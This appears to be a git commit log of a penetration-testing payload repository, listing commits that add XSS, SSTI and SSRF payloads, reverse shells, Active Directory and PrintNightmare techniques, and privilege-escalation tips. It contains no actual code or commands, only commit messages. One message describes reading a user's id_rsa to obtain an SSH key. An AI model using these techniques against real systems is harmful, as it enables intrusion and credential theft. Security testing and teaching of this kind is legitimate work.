7369ee28b3 Added XSS <object> payload 2021-09-02 15:14:29 +02:00
Swissky
0f94adafe5 ESC2 + Windows Search Connectors - Windows Library Files 2021-09-01 14:10:53 +02:00
Swissky
88321a332f Merge pull request #418 from p0dalirius/patch-1
54 context-free payloads for SSTI in Mako templates
2021-08-26 22:21:16 +02:00
Podalirius
4c29079010 Update README.md 2021-08-26 20:50:19 +02:00
Swissky
1e85308ae2 Merge pull request #395 from daffainfo/patch-1
Adding Cloudflare XSS payload
2021-08-25 22:21:54 +02:00
Swissky
bef56844aa Merge pull request #411 from lollipophacker1337/master
Added a resource to the Dependency Confusion repo.
2021-08-25 22:21:26 +02:00
Swissky
46cd766d0f Merge pull request #414 from nomothane/master
Backwards compatibility for Python 2
2021-08-25 22:20:17 +02:00
Swissky
f89597725a Merge pull request #416 from Bort-Millipede/master
Expression Language Injection One-Liners; XSS Payload; Fixed Linux Py…
2021-08-25 22:17:53 +02:00
Swissky
7c06c9025e Update README.md 2021-08-25 22:17:34 +02:00
Swissky
69b99826d2 AD CS Attacks 2021-08-25 22:14:44 +02:00
Swissky
8a6220c1a2 Merge pull request #417 from noraj/patch-1
XSS: document.domain, window.origin and console.log usage
2021-08-24 21:03:45 +02:00
Alexandre ZANNI
4791962be5 document.domain, window.origin and console.log usage 2021-08-24 20:29:02 +02:00
Jeffrey Cap
9bde75b32d Expression Language Injection One-Liners; XSS Payload; Fixed Linux Python IPv6 Reverse Shell Payload 2021-08-23 14:41:40 -05:00
Swissky
fde99044c5 CS NTLM Relay 2021-08-22 23:03:02 +02:00
Ethan
68a4c9296b Backwards compatibility for Python 2 2021-08-11 20:40:39 +01:00
Swissky
6cba7ceda9 Merge pull request #413 from sudoutopia/master
GROUP_CONCAT equivalent for MSSQL
2021-08-11 17:54:46 +02:00
sudoutopia
f18cb9b569 GROUP_CONCAT equivalent for MSSQL 2021-08-11 17:07:55 +02:00
Swissky
87be30d3b2 DB2 Injection + ADCS 2021-08-10 23:00:19 +02:00
Alvin Smith
31a1cdc86f Rename web.web.config to web.config 2021-08-09 22:48:10 +12:00
Alvin Smith
a092546230 Delete web.config as it's not working 2021-08-09 22:47:57 +12:00
lollipophacker1337
d966e25bc0 Update README.md 2021-08-09 04:29:45 +06:00
lollipophacker1337
6d46fe774e Update README.md 2021-08-09 04:29:21 +06:00
Swissky
01f2a02c52 Merge pull request #410 from clem9669/patch-7
Update SSRF
2021-08-06 19:29:57 +02:00
clem9669
f4053576f4 Update SSRF
Adding octal techniques for SSRF. 

DEFCON video: https://www.youtube.com/watch?v=_o1RPJAe4kU
2021-08-06 15:55:55 +00:00
Swissky
ab9e8a2ba2 Merge pull request #409 from Xib3rR4dAr/patch-1
Update README.md
2021-08-04 09:39:43 +02:00
Xib3rR4dAr
ae98d629f0 Update README.md
Removed duplicates.
2021-08-04 09:29:24 +05:00
Swissky
b3f5637103 Merge pull request #397 from c14dd49h/master
Update README.md
2021-07-31 11:29:08 +02:00
Swissky
1fd9260d1e Update README.md 2021-07-31 11:28:23 +02:00
Swissky
7ab7664469 Merge pull request #399 from Bort-Millipede/master
New/Updated Python Linux Reverse Shells
2021-07-31 11:26:36 +02:00
Swissky
38a209b14d Merge pull request #406 from pang9979/master
Update Table
2021-07-31 11:25:45 +02:00
pang9979
7cb359644a Update table 2021-07-30 13:34:02 +08:00
pang9979
33cf9fa2d2 Add one technology to the table 2021-07-28 19:15:45 +08:00
Swissky
ce14006be0 Merge pull request #404 from p0dalirius/master
Added context-free jinja2 payloads
2021-07-27 19:51:08 +02:00
Podalirius
3bed3bccc8 Added context-free jinja2 payloads
Fixed a few typos and broken links
2021-07-27 19:20:36 +02:00
Swissky
18cd445a5b Merge pull request #400 from PinkDev1/patch-1
Added gentilkiwi twitter
2021-07-27 10:37:15 +02:00
PinkDev1
a571df2585 Added gentilkiwi twitter 2021-07-27 04:17:36 +00:00
Jeffrey Cap
37e69b6162 Revised Linux Python Reverse Shells; Added New Linux Python Reverse Shells 2021-07-26 20:55:49 -05:00
Swissky
d9d4a54d03 RemotePotato0 + HiveNightmare 2021-07-26 21:25:56 +02:00
Swissky
2d273fd40e Merge pull request #398 from bash-c/patch-1
add missing header file in Linux - Privilege Escalation.md
2021-07-26 11:49:01 +02:00
M4x
9086ff9d03 add missing header file 2021-07-26 16:04:39 +08:00
Swissky
3a4bd97762 AD CS - Mimikatz / Rubeus 2021-07-25 11:40:19 +02:00
c14dd49h
ee12f8e480 Update README.md 2021-07-22 16:55:03 +02:00
c14dd49h
eddc716d8c Update README.md 2021-07-22 14:47:36 +02:00
Swissky
1b244ca690 Merge pull request #388 from jeremybuis/patch-1
Adds Lessjs injections
2021-07-16 18:54:48 +02:00
Jeremy Buis
6841fc21d2 Update README.md
Fixes a typo
2021-07-16 11:24:16 -04:00
Muhammad Daffa
2b6c3cb360 Adding Cloudflare XSS payload 2021-07-15 12:48:02 +07:00
Swissky
3f2f156c12 File Upload Update 2021-07-14 17:10:04 +02:00
Swissky
44735975a5 Active Directory update 2021-07-12 20:45:16 +02:00
Swissky
175c676f1e Tmux PrivEsc + PrintNightmare update 2021-07-12 14:42:18 +02:00
Swissky
975a23ae34 Merge pull request #389 from noraj/patch-1
add CVE-2021-34527 + It Was All A Dream scanner
2021-07-08 15:49:27 +02:00
Alexandre ZANNI
e2ff22b136 add CVE-2021-34527 + It Was All A Dream scanner 2021-07-08 10:40:01 +02:00
Jeremy Buis
a0c08e4e87 Update README.md
Added Lessjs example PoC
2021-07-06 10:36:43 -04:00
Swissky
2f8fc7bbb9 PrintNightmare - Mimikatz 2021-07-05 21:57:14 +02:00
Swissky
459f4c03fc Dependency Confusion + LDAP 2021-07-04 13:32:32 +02:00
Swissky
043e5a105e Merge pull request #387 from srabraham/patch-1
Fix typo in Linux - Persistence.md
2021-07-03 00:55:11 +02:00
Sean R. Abraham
1fcbd576fe Fix typo in Linux - Persistence.md 2021-07-02 16:18:35 -06:00
Swissky
2148c89452 Merge pull request #386 from bhattsameer/patch-2
Added Reverse Shell using Telnet
2021-07-01 19:14:23 +02:00
Sameer Bhatt (debugger)
0b8293b135 Added Reverse Shell using Telnet
2021-07-01 20:29:56 +05:30
Swissky
80816aee31 PrintNightmare - #385 2021-07-01 14:40:03 +02:00
Swissky
4e95162dc3 BadPwdCount attribute + DNS 2021-06-28 22:08:06 +02:00
Swissky
ab0e487500 Cobalt Strike spunner + pivotnacci 2021-06-27 23:58:13 +02:00
Swissky
628481cd4d Merge pull request #384 from leongross/master
issue #286
2021-06-25 10:25:03 +02:00
Swissky
4519df200c Merge pull request #383 from leongross/patch-1
Update Subdomains Enumeration.md Issue #369
2021-06-25 10:24:08 +02:00
Leon Gross
391755ec20 add new PHP deserialization resource 2021-06-25 09:51:00 +02:00
Leon Gross
70d0ae9ed6 issue #286 2021-06-25 09:41:39 +02:00
leongross
e31de3dd6b Update Subdomains Enumeration.md 2021-06-25 09:17:27 +02:00
Swissky
85a7ac8a76 Shadow Credentials + AD CS Relay + SSSD KCM 2021-06-24 15:26:05 +02:00
Swissky
0ba120e250 Fix #382 2021-06-23 22:14:55 +02:00
Swissky
9f5cf0357a Merge pull request #381 from hahwul/master
Added referer header validation check in CSRF
2021-06-23 14:05:23 +02:00
HAHWUL
2a16009386 Added referer header validation check in CSRF 2021-06-23 10:05:14 +09:00
Swissky
a69e911926 Merge pull request #379 from alexlauerman/master
Adding updated flowchart to CSRF page
2021-06-19 09:46:49 +02:00
Alex Lauerman
aeecfe0742 Adding updated flowchart 2021-06-18 11:01:17 -05:00
Alex Lauerman
fdc65d3ad1 Add files via upload 2021-06-18 10:55:04 -05:00
Swissky
18556c2caf Merge pull request #378 from PinkDev1/patch-3
Fixed typo/wording on "Tips" section in Blind-XSS
2021-06-17 09:24:06 +02:00
PinkDev1
21c1690adf Fixed typo on "Tips" section 2021-06-16 19:24:17 +00:00
Swissky
e9b38b8f43 Merge pull request #377 from ajdumanhug/master
Add AWS SSRF Bypasses
2021-06-16 18:41:39 +02:00
Aj Dumanhug
78e8bcf136 Add AWS SSRF Bypasses 2021-06-16 23:42:50 +08:00
Swissky
62b897c936 Merge pull request #376 from noraj/patch-2
XSS: add quick tips for bXSS
2021-06-16 13:56:29 +02:00
Swissky
2a4631eb8f Merge pull request #375 from noraj/patch-1
XSS: remove bluelotus
2021-06-16 13:56:07 +02:00
Alexandre ZANNI
c469236204 XSS: add quick tips for bXSS 2021-06-16 13:25:46 +02:00
Alexandre ZANNI
8547ac7dfc XSS: remove bluelotus
the project is empty
2021-06-16 13:18:08 +02:00
Swissky
b006551bfe Merge pull request #374 from tex2e/patch-1
Fix snippets
2021-06-14 16:10:54 +02:00
Mako
9c569990dc Fix snippets
Fix snippets in Command Injection.
2021-06-14 19:36:23 +09:00
Swissky
ad9c15b824 Merge pull request #370 from Annihilat0r/master
add NoSQLi payload
2021-05-29 22:38:13 +02:00
Korolenko Serhii
013ca1f9b0 add NoSQLi payload 2021-05-29 13:04:13 +03:00
Swissky
e3e3ca6ba2 Merge pull request #366 from mpgn/master
Update Smarty Template Injection
2021-05-20 18:08:20 +02:00
mpgn
367296c1f1 Update Smarty Template Injection 2021-05-20 16:42:51 +02:00
Swissky
28f68f47ae Merge pull request #365 from Shrewk/patch-1
Updates JWT tool
2021-05-19 12:05:59 +02:00
Shrewk
99e4868447 Updates JWT tool
Update of JWT_Tool args
2021-05-19 03:26:57 +02:00
Swissky
4ae6982f63 Merge pull request #362 from noraj/patch-1
add RCE via Apache logs in log poisoning
2021-05-10 13:13:34 +02:00
Alexandre ZANNI
61eed94f18 add RCE via Apache logs in log poisoning 2021-05-10 11:48:14 +02:00
Swissky
a723a34449 PS Transcript + PPLdump.exe 2021-05-06 18:26:00 +02:00
Swissky
28a48bd696 Merge pull request #361 from sokaRepo/master
Add AWS DynamoDB enumeration
2021-04-30 22:21:28 +02:00
soka
a4bdabea83 Add AWS DynamoDB enumeration 2021-04-30 21:44:21 +02:00
Swissky
1592756f9c Merge pull request #348 from pswalia2u/patch-1
Update Reverse Shell Cheatsheet.md
2021-04-26 10:05:59 +02:00
Swissky
9753f369e3 Merge pull request #358 from gregxsunday/master
improved XXE SVG payloads to be valid XMLs
2021-04-24 15:40:01 +02:00
gregxsunday
43a9a5d235 improved XXE SVG payloads to be valid XMLs 2021-04-24 14:45:45 +02:00
Swissky
08b59f2856 AD update CME+DCOM 2021-04-21 22:27:07 +02:00
Swissky
22340c8fc2 Merge pull request #356 from 0dayCTF/patch-1
Update Reverse Shell Cheatsheet.md
2021-04-18 18:34:49 +02:00
Ryan Montgomery
7ae038d919 Update Reverse Shell Cheatsheet.md
Added: Automatic Reverse Shell Generator
2021-04-18 10:50:41 -04:00
Swissky
ba2c02cc3e Merge pull request #355 from clem9669/patch-6
Update Linux - Privilege Escalation.md
2021-04-15 12:46:15 +02:00
clem9669
7a564cb859 Update Linux - Privilege Escalation.md
Fixing Markdown URL typo in writable network-scripts section
2021-04-15 10:07:43 +00:00
Swissky
2b43fa8bfc Merge pull request #353 from micahvandeusen/master
Added method to read gMSA
2021-04-10 18:04:28 +02:00
Micah Van Deusen
f23de13d96 Added method to read gMSA 2021-04-10 10:58:05 -05:00
Swissky
90eefc3b2e Merge pull request #351 from ricxpl/patch-1
Improve Ruby reverse shell
2021-04-02 22:39:36 +02:00
Ricardo
604618ed41 Improve Ruby reverse shell
Now the reverse shell supports the "cd" command and maintains persistence when an error is raised.
2021-04-02 16:36:58 -04:00
Swissky
d8d26d8fb3 Merge pull request #350 from secnigma/patch-2
Added Netcat BusyBox
2021-04-01 14:31:12 +02:00
secnigma
059a866fd2 Added Netcat BusyBox
Some embedded systems like BusyBox won't have mkfifo present; instead, they will have mknod. This updated code can spawn a reverse shell on systems that use mknod instead of mkfifo.
2021-04-01 13:27:20 +05:30
Swissky
4f89c0a6d2 Merge pull request #349 from SecGus/master
Add .ashx shell
2021-03-30 15:31:53 +02:00
chivato
2c0fff2a7a Add .ashx shell 2021-03-30 13:56:31 +01:00
pswalia2u
209380740b Update Reverse Shell Cheatsheet.md
Added new Bash TCP reverse shell
2021-03-28 18:58:07 +05:30
Swissky
0443babe35 Relay + MSSQL Read File 2021-03-25 18:25:02 +01:00
Swissky
f6b9d63bf8 DCOM exploitation and MSSQL CLR 2021-03-24 22:26:23 +01:00
Swissky
bd2166027e GMSA Password + Dart Reverse Shell 2021-03-24 12:44:35 +01:00
Swissky
af9f103655 Merge pull request #346 from linoskoczek/master
Fix links in XSS Injection Summary
2021-03-18 21:18:28 +01:00
linoskoczek
825295e465 Update README.md
Fix broken links in Summary
2021-03-18 19:16:59 +00:00
Swissky
5a3427cf9b Merge pull request #345 from Tametomo/patch-1
Added additional CSV injection cases patterned after in the wild samples
2021-03-17 09:36:25 +01:00
Tametomo
126555e5f9 Update README.md
Add additional CSV test cases
2021-03-16 19:17:01 -06:00
Swissky
22a1662f60 Merge pull request #341 from cosmin-bianu/master
Fix Java payload (issue #337)
2021-03-12 12:36:19 +01:00
cosmin-bianu
13d54a5c24 Fixed Java payload
- Declared variables
- Added semicolons at the end of each line
- Fixed the bash command
2021-03-12 13:20:15 +02:00
Swissky
d61f683dc6 Merge pull request #339 from c14dd49h/patch-2
Update Active Directory Attack.md
2021-02-26 16:37:41 +01:00
c14dd49h
ca28c69e67 Update Active Directory Attack.md 2021-02-26 14:14:10 +01:00
Swissky
8d31b7240b Office Attacks 2021-02-21 20:17:57 +01:00
Swissky
e128964dd9 Merge pull request #338 from mpgn/patch-1
Add mimikatz command to protect a process after removing the protection
2021-02-17 12:32:23 +01:00
mpgn
d1c23c5863 Unload the service mimi 2021-02-17 12:21:16 +01:00
mpgn
9be371d793 add mimikatz command to protect a process again after removing the protection
fe4e984055/mimikatz/modules/kuhl_m_kernel.c (L99)
2021-02-17 12:15:47 +01:00
Swissky
f6f8ec010a Merge pull request #336 from valenbg1/patch-1
Update Windows - Privilege Escalation.md
2021-02-10 16:36:19 +01:00
Valentín Blanco
73f6ab940c Update Windows - Privilege Escalation.md
Adding WES-NG which is a great and updated replacement for Windows-Exploit-Suggester.
2021-02-10 15:52:41 +01:00
Swissky
1d08a7e12d Merge pull request #335 from unkn0w/patch-1
[typo] changed sshs_config to sshd_config
2021-02-05 14:36:05 +01:00
Jakub 'unknow' Mrugalski
9244fe0480 [typo] changed sshs_config to sshd_config 2021-02-05 12:24:49 +01:00
Swissky
495a1f3ffe Merge pull request #334 from lanjelot/git-dumper
New tool git-dumper.py
2021-02-03 15:41:27 +01:00
lanjelot
34dff949a2 Fix ToC 2021-02-04 00:47:00 +11:00
lanjelot
fd6d7f360e New tool git-dumper.py 2021-02-03 21:15:55 +11:00
Swissky
6bcd2e8a6a Update README.md 2021-01-31 21:51:53 +01:00
Swissky
b4d8b5939f Merge pull request #332 from kazkansouh/master
Add a one line postgres file write
2021-01-30 21:59:01 +01:00
Karim Kanso
826130946c Add a one line postgres file write 2021-01-30 14:17:35 +00:00
Swissky
092083af5c AD - Printer Bug + Account Lock 2021-01-29 22:10:22 +01:00
Swissky
075721fa9b Merge pull request #331 from PinkDev1/patch-2
Added EoP - $PATH Interception
2021-01-28 22:12:51 +01:00
PinkDev1
93769768e2 Added EoP - $PATH Interception 2021-01-28 19:45:54 +00:00
Swissky
ec856fec21 Merge pull request #330 from JLLeitschuh/patch-2
Add XXE via DTD file
2021-01-25 18:02:38 +01:00
Jonathan Leitschuh
92667a12a4 Add XXE via DTD file 2021-01-25 11:50:47 -05:00
Swissky
4c7dd435a6 Merge pull request #329 from PinkDev1/patch-1
API Key Leaks: Added commands for testing Mapbox API Tokens
2021-01-25 10:38:58 +01:00
PinkDev1
88aa7c9789 Added commands for testing Mapbox API Tokens 2021-01-25 04:34:40 +00:00
Swissky
2ac947e46d Merge pull request #327 from ayomawdb/patch-2
Add PostgreSQL Check if Current User is Superuser
2021-01-24 18:44:12 +01:00
Swissky
4e17d6c2b3 Update PostgreSQL Injection.md 2021-01-24 18:43:58 +01:00
Swissky
cd6f5493b3 Update PostgreSQL Injection.md 2021-01-24 18:43:28 +01:00
Ayoma Wijethunga
4b8dab523e Add PostgreSQL Check if Current User is Superuser 2021-01-24 23:09:52 +05:30
Swissky
daebeeadd2 Merge pull request #326 from ayomawdb/patch-1
Add Kubernetes Pentest Methodology Part 3
2021-01-20 11:01:42 +01:00
Ayoma Wijethunga
b04579aa30 Add Kubernetes Pentest Methodology Part 3
$subject and minor correction of a file path
2021-01-20 09:07:23 +05:30
Swissky
0675573d93 Merge pull request #325 from u0pattern/u0pattern-patch-1
SSTI Payload in Jinja2 - Arbitrary file read
2021-01-18 10:08:47 +01:00
ムハンマド
89429f9c4f SSTI Payload in Jinja2 - Arbitrary file read 2021-01-18 11:48:38 +03:00
Swissky
d4d2ba45c2 Merge pull request #323 from lanjelot/protocol-smuggling
Add PortSwigger http-desync reborn article
2021-01-16 19:04:16 +01:00
lanjelot
c5d8f3fc4f Add PortSwigger http-desync reborn article 2021-01-17 04:23:38 +11:00
Swissky
7b943d46bc Merge pull request #322 from lapolis/patch-1
Added closing bracket in unicode full width bypass
2021-01-15 17:42:13 +01:00
lapolis_aka_blu
6f758ba6c0 Added closing bracket in unicode full width bypass
Yeah I know it is logical to use it only if you really need the closing tag. But having both brackets in your repo makes it quicker to copy paste :D
2021-01-15 16:38:51 +00:00
Swissky
01aadf3a44 Alternate Data Stream 2021-01-13 10:22:59 +01:00
Swissky
836861c86e Merge pull request #320 from lanjelot/cloudsplaining
New cloudsplaining tool to AWS Pentest page
2021-01-12 13:42:36 +01:00
Swissky
964f2cde35 Merge pull request #319 from lanjelot/insecure-scm-cleanup
Cleaned up Insecure SCM page and added new Yar tool
2021-01-12 13:36:38 +01:00
lanjelot
5cfa93f98b Add new cloudsplaining tool to AWS Pentest page 2021-01-12 22:59:37 +11:00
lanjelot
4473764c4d Fix ToC 2021-01-12 22:45:12 +11:00
lanjelot
8c97cec6d8 Clean up Insecure SCM page and add new tool yar 2021-01-12 22:39:37 +11:00
Swissky
3a6ac550b8 DSRM Admin 2021-01-08 23:41:50 +01:00
Swissky
dd80fb899c Merge pull request #315 from timgates42/bugfix_typo_account
docs: fix simple typo, accound -> account
2020-12-22 23:53:27 +01:00
Tim Gates
7846225bfd docs: fix simple typo, accound -> account
There is a small typo in Methodology and Resources/Active Directory Attack.md.

Should read `account` rather than `accound`.
2020-12-23 09:16:40 +11:00
Swissky
609c38bde5 Merge pull request #314 from ahboon/HTTP-Parameter-Pollution
Added Golang param information
2020-12-22 20:02:56 +01:00
Cher Boon
70d8db7de4 Updated to include modules used for golang 2020-12-23 01:30:23 +08:00
Cher Boon
a6727e8305 Added Golang information 2020-12-23 01:28:32 +08:00
Swissky
0929d5596c Merge pull request #313 from ahboon/HTTP-Parameter-Pollution
Created HTTP Parameter Pollution
2020-12-22 11:27:07 +01:00
Cher Boon
20da830ac1 Create README.md 2020-12-22 17:49:45 +08:00
Swissky
16b207eb0b LAPS Password 2020-12-20 21:45:41 +01:00
Swissky
67752de6e9 Bronze Bit Attack 2020-12-18 22:38:30 +01:00
Swissky
66a0fd1cbe Merge pull request #311 from lanjelot/deser
Add tool gadgetprobe
2020-12-18 15:25:26 +01:00
Swissky
1e69ec63a8 Merge pull request #312 from lanjelot/ebs
Update Cloud AWS Methodology
2020-12-18 15:24:41 +01:00
Swissky
35a86f81d7 Merge pull request #310 from lanjelot/smuggler
Add tools kube-hunter and smuggler
2020-12-18 15:22:20 +01:00
lanjelot
4dc5777c33 Add gadgetprobe tool 2020-12-18 23:03:25 +11:00
lanjelot
e0c745cbf4 Fix AWS duplicated tool enumerate-iam 2020-12-18 22:52:21 +11:00
lanjelot
d2d1a2d913 Add tools 2020-12-18 22:46:28 +11:00
lanjelot
4b9baf37d3 Add dufflebag tool and cleanup 2020-12-18 22:45:07 +11:00
Swissky
f7e8f515a5 Application Escape and Breakout 2020-12-17 08:56:58 +01:00
Swissky
973f091d1b Merge pull request #308 from lanjelot/fix-web-methodology
Fix links and duplicated nmap and massscan examples
2020-12-12 19:43:34 +01:00
Swissky
3e50b711b7 Merge pull request #307 from lanjelot/fix-typos
Fix typos
2020-12-12 19:42:46 +01:00
lanjelot
4c18e29a6b Fix links and duplicated nmap and massscan examples 2020-12-13 04:50:59 +11:00
lanjelot
7e3db3a3f4 Fix typos 2020-12-13 04:34:10 +11:00
Swissky
aab4f3e14b Merge pull request #306 from lanjelot/master
Add reference to panoptic and rip-hg tools
2020-12-11 19:04:53 +01:00
lanjelot
c6d0ba29e7 Add reference to panoptic and rip-hg tools 2020-12-12 04:52:21 +11:00
Swissky
b5a758dada Merge pull request #305 from lanjelot/master
Add missing url
2020-12-11 18:39:38 +01:00
lanjelot
aaff374395 Add missing url 2020-12-12 04:26:31 +11:00
Swissky
e58bfe8310 Merge pull request #304 from lanjelot/master
Add tool GitTools
2020-12-11 18:25:58 +01:00
lanjelot
4ab874d854 Add tool GitTools 2020-12-12 04:19:54 +11:00
Swissky
73fdd6e218 Mimikatz - Elevate token with LSA protection 2020-12-09 23:33:40 +01:00
Swissky
12aab45018 Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings 2020-12-08 14:31:47 +01:00
Swissky
19a2950b8d AMSI + Trust 2020-12-08 14:31:01 +01:00
Swissky
2f83ee56f4 Merge pull request #302 from noraj/patch-1
add another example of XXE in XLSX
2020-12-08 11:36:26 +01:00
Alexandre ZANNI
7733d4495e add another example of XXE in XLSX 2020-12-08 09:50:30 +01:00
Swissky
78cc68674b Merge pull request #296 from brnhrd/patch-1
Fix table of contents
2020-12-07 17:21:02 +01:00
Swissky
f48ee0bca5 Deepce - Docker Enumeration, Escalation of Privileges and Container Escapes 2020-12-06 18:59:43 +01:00
Swissky
27050f6dd8 MSSQL Server Cheatsheet 2020-12-05 11:37:34 +01:00
Swissky
e9390d1572 Merge pull request #297 from u0pattern/u0pattern-patch-1
XXE WAF Bypass Added
2020-12-04 10:21:17 +01:00
ムハンマド
eb75a7e304 XXE WAF Bypass Added 2020-12-04 05:16:37 +03:00
Swissky
e13f152b74 AD - Recon 2020-12-02 18:43:13 +01:00
brnhrd
15e44bdfe6 Fix table of contents 2020-12-02 14:19:59 +01:00
Swissky
3314f8bd99 Merge pull request #294 from lanjelot/add-s3-objects-check
Add tool nccgroup/s3_objects_check
2020-11-29 19:25:07 +01:00
lanjelot
bca107cc64 Move duplicated tool references into one place 2020-11-30 01:38:04 +11:00
lanjelot
10e6c075f7 Add tool nccgroup/s3_objects_check 2020-11-30 01:17:15 +11:00
Swissky
7cd34d4ffa Merge pull request #293 from cervoise/patch-1
Update README.md
2020-11-26 18:45:16 +01:00
Cervoise
e9de4e9d78 Update README.md
Add the "?" trick.
2020-11-26 16:43:10 +01:00
Swissky
b918095775 AzureHound 2020-11-24 12:41:34 +01:00
Swissky
13ed9c8628 Merge pull request #292 from paupaulaz/master
Puts the H1 reports at the right place
2020-11-22 12:57:27 +01:00
paupaulaz
b7547cc171 Puts the H1 reports at the right place
The HackerOne reports mentioned in this doc are referring to Request Smuggling, not CSRF.
2020-11-22 10:52:20 +01:00
Swissky
a639121b21 Merge pull request #291 from marcan2020/patch-11
Remove unnecessary condition to extract columns
2020-11-18 10:12:53 +01:00
marcan2020
3cf44386da Remove unnecessary condition to extract columns
Since we retrieve only the rows with a specific table name (`name ='table_name'`), the table name won't start with `sqlite_`.
Thus, we can remove the unnecessary condition.
2020-11-17 19:59:11 -05:00
Swissky
8863292545 Merge pull request #290 from bascoe10/patch-1
Sorted the list of revshell options
2020-11-14 22:28:53 +01:00
Abass Sesay
95b07c9e3e Sorted the list of revshell options
Minuscule change because it was grinding my gears that the list is not sorted :-)
2020-11-14 09:20:49 -08:00
Swissky
a60caaefef Merge pull request #289 from samsbp/master
Update ssrf payloads specific to java
2020-11-08 12:47:15 +01:00
PwnL0rd
bde7fc738c added link in the reference section 2020-11-08 12:00:35 +05:30
security-is-myth
f3066722ee update SSRF/README.md with java payloads 2020-11-07 22:07:18 +05:30
security-is-myth
08bc3acb05 update SSRF/README.md with java payloads 2020-11-07 22:03:02 +05:30
Swissky
bd184487e5 NTLM Hashcat 2020-11-06 16:20:03 +01:00
Swissky
6a82f47f32 Merge pull request #288 from bolli95/master
TWITTER.md added
2020-11-03 12:57:53 +01:00
Swissky
0492545960 Update TWITTER.md 2020-11-03 12:57:33 +01:00
Max Boll
5930efcb80 TWITTER.md added 2020-11-03 11:37:20 +01:00
Swissky
f9e2512080 Merge pull request #287 from beomsu317/master
Update SQL-Injection
2020-11-03 10:38:02 +01:00
Swissky
464fbeb8f4 Merge pull request #285 from random-robbie/patch-1
Update README.md
2020-10-31 22:47:09 +01:00
Robbie
e8fccb6dd2 Update README.md
added 169.254.169.254 decimal
2020-10-31 20:19:27 +00:00
Swissky
7f36bf58a4 Merge pull request #284 from akoul02/patch-1
Improved Jade payload
2020-10-31 16:47:10 +01:00
akoul02
ed944a95af Improved Jade payload 2020-10-31 18:02:29 +03:00
Swissky
1137bfca8d Remote Desktop Services Shadowing 2020-10-30 21:10:00 +01:00
Swissky
4fe1d71ad8 Merge pull request #283 from d4rkc0nd0r/patch-9
Update MySQL Injection.md
2020-10-29 16:44:14 +01:00
Siddharth Reddy
2bdd23dc51 Update MySQL Injection.md 2020-10-29 17:03:22 +05:30
Swissky
c7be142d62 Merge pull request #282 from Gorgamite/patch-3
Added winPEAS to windows privilege escalation tool
2020-10-29 12:20:55 +01:00
Gorgamite
f9389d708b Added winPEAS to windows privilege escalation tool
WinPEAS is a really thorough privesc enumeration tool for Windows; you can find it here: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe
It doesn't auto-exploit, but it's rather thorough and effective.
2020-10-29 03:57:40 -07:00
Swissky
db533aabd4 Merge pull request #280 from Gorgamite/master
Added LinPEAS to Linux Privesc.
2020-10-29 11:56:44 +01:00
Swissky
2746451408 Merge pull request #279 from Gorgamite/patch-1
Added more information on kernel exploits
2020-10-29 11:55:25 +01:00
Gorgamite
ff3b45e0b7 Added LinPEAS to Linux Privesc.
I very strongly recommend adding LinPEAS to the enumeration tools. LinPEAS is arguably the best Linux privesc enumeration tool out there. If you haven't used it, I'd try it out. It highlights all relevant information with color-coded text, and you can pass it parameters to control the thoroughness of the scan. You should add WinPEAS for Windows privesc as well.
2020-10-29 03:50:05 -07:00
Gorgamite
1b69a3ef73 Update Linux - Privilege Escalation.md 2020-10-29 03:22:08 -07:00
Swissky
9eb84bcfb7 Merge pull request #278 from marcan2020/patch-10
Add Springboot Actuator RCE
2020-10-28 18:37:38 +01:00
marcan2020
1535077d9d Add Springboot Actuator RCE 2020-10-28 12:05:12 -04:00
Swissky
ae3a4d4336 Merge pull request #277 from bolli95/master
XSS detection tools added
2020-10-27 15:08:56 +01:00
Max Boll
2a65064d15 little update 2020-10-27 14:10:35 +01:00
Max Boll
8448bbc483 Merge branch 'master' of github.com:bolli95/PayloadsAllTheThings 2020-10-27 13:31:51 +01:00
Max Boll
350c55a1ac XSS Tools added 2020-10-27 13:31:37 +01:00
Swissky
99f53ae9b4 Merge pull request #276 from clem9669/patch-5
Adding marshalsec tool & references
2020-10-26 16:35:02 +01:00
clem9669
f7c837ffdd Adding marshalsec tool & references
Adding marshalsec tool & references
2020-10-26 14:43:16 +00:00
Swissky
c52cfb1200 Merge pull request #275 from c-nagy/master
Added a brief overview for type juggling
2020-10-26 14:57:06 +01:00
@cnagy
ec445110d6 Added a brief overview for type juggling 2020-10-25 19:19:44 +00:00
Swissky
fa497c2149 Merge pull request #274 from bolli95/master
CORS and CRLF documentation updated
2020-10-25 14:02:02 +01:00
Swissky
9992990e40 Update README.md 2020-10-25 14:01:53 +01:00
Swissky
9e61eb91be Merge pull request #273 from Gorgamite/master
Specifying alternative access method through SSH
2020-10-25 11:50:01 +01:00
Max Boll
91fc542c81 Merge branch 'master' of github.com:bolli95/PayloadsAllTheThings 2020-10-25 11:08:15 +01:00
Max Boll
570213a2f8 CORS and CRLF README.md updated 2020-10-25 11:07:50 +01:00
Gorgamite
1f96d34ddf Specifying alternative access method through SSH
Specifying an alternative access method through SSH, since SSH is assumed to be running on the Linux machine. Read id_rsa for that user to obtain the SSH private key.
2020-10-25 02:51:07 -07:00
Swissky
955557d175 Merge pull request #272 from op01/master
add type juggling example
2020-10-23 18:30:32 +02:00
OOP
f2e3078915 add reference 2020-10-23 23:15:59 +07:00
OOP
35f2834eaa add type juggling example 2020-10-23 23:12:45 +07:00
Swissky
e9c0581fa6 Merge pull request #270 from bolli95/master
Tabnabbing explanation added
2020-10-20 11:34:13 +02:00
Swissky
0f125243ab Update README.md 2020-10-20 11:34:02 +02:00
Max Boll
33ab643c0d Rename Tabnabbing.md to README.md 2020-10-20 11:24:39 +02:00
Max Boll
fae1f339e2 typos fixed 2020-10-20 11:22:25 +02:00
Max Boll
3671248485 typing errors fixed 2020-10-20 11:20:56 +02:00
Max Boll
a026ad0727 tabnabbing.md added 2020-10-20 11:17:01 +02:00
Swissky
7f90601372 Merge pull request #269 from marcan2020/patch-9
Add Password Reset Via Username Collision
2020-10-19 00:18:57 +02:00
marcan2020
3a5f98e177 Add Password Reset Via Username Collision 2020-10-18 18:13:18 -04:00
Swissky
7510307a59 Merge pull request #264 from d4rkc0nd0r/patch-5
Update README.md
2020-10-18 22:30:56 +02:00
Swissky
bf7fc8939b Merge pull request #268 from marcan2020/patch-8
Update big CVEs list
2020-10-18 22:30:21 +02:00
marcan2020
94d37e057c Update big CVEs list
- Add EternalBlue and BlueKeep CVEs
- Move Heartbleed and Shellshock in the "older" section since they were found more than 5 years ago
2020-10-18 16:17:03 -04:00
Swissky
8a59b22a64 Merge pull request #267 from Rude-Monkey/master
